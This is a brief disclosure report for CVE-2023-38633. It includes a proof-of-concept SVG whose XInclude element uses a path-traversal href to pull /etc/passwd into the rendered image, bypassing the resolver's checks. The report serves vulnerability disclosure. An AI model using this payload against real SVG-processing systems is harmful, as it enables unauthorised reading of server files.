CVE-2023-38633: Arbitrary file read when xinclude href has special characters

This is now CVE-2023-38633.

This was reported by Zac Sims.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <rect width="300" height="300" style="fill:rgb(255,255,255);" />
  <text x="10" y="100">
    <xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
      <xi:fallback>file not found</xi:fallback>
    </xi:include>
  </text>
</svg>

This ends up actually including the contents of /etc/passwd, bypassing the checks in UrlResolver::resolve_href().

Analysis follows.